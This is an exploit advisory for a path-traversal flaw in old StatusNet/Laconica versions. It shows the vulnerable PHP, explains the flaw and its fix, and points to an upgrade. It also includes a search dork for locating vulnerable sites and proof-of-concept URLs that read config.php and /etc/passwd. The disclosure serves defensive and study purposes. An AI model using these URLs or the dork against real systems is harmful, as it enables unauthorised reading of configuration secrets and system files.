+-------------------------------------------------------------------------------+
+ StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
+-------------------------------------------------------------------------------+

# Date:
- 10/10/2013

# Exploit Author:
- spiderboy

# Vendor Homepage:
- http://status.net/

# Software Links:
- http://status.net/laconica-0.7.4.tar.gz
- http://status.net/statusnet-0.8.2.tar.gz
- http://status.net/statusnet-0.9.0beta3.tar.gz

# Version:
- Branch 0.7.X : <= 0.7.4
- Branch 0.8.X : <= 0.8.2
- Branch 0.9.X : <= 0.9.0beta3

# Tested on:
- Unix/Linux

# Category:
- Webapps

# Platform:
- php

# Advisories:
- http://status.net/wiki/Security_alert_0000002
- http://osvdb.org/show/osvdb/95586

# Google Dork:
- "It runs the StatusNet microblogging software, version 0.8.2"

# Vendor product description:
- Free and Open Source social software

# Vulnerable code:
- actions/doc.php:
--------------------------------------------------------------------
function handle($args)
{
    parent::handle($args);

    $this->title = $this->trimmed('title');
    $this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]

    if (!file_exists($this->filename)) {
        $this->clientError(_('No such document.'));
        return;
    }

    $this->showPage();
}
--------------------------------------------------------------------
[1] : The user-supplied `title` parameter is concatenated directly into a filesystem path with no validation or normalization, so `../` sequences escape the intended `doc-src/` directory (path traversal). The following `file_exists()` check only confirms that the target exists; it does not constrain the resolved path to `doc-src/`. A fix has to reject path separators and `..` components in `title`, or verify that the resolved (realpath) filename still lies inside the `doc-src/` directory before it is used.

# Proof of concept:
- http://[host]/index.php?action=doc&title=../config.php
- http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd

# Solution:
- Upgrade to the latest version: http://status.net/download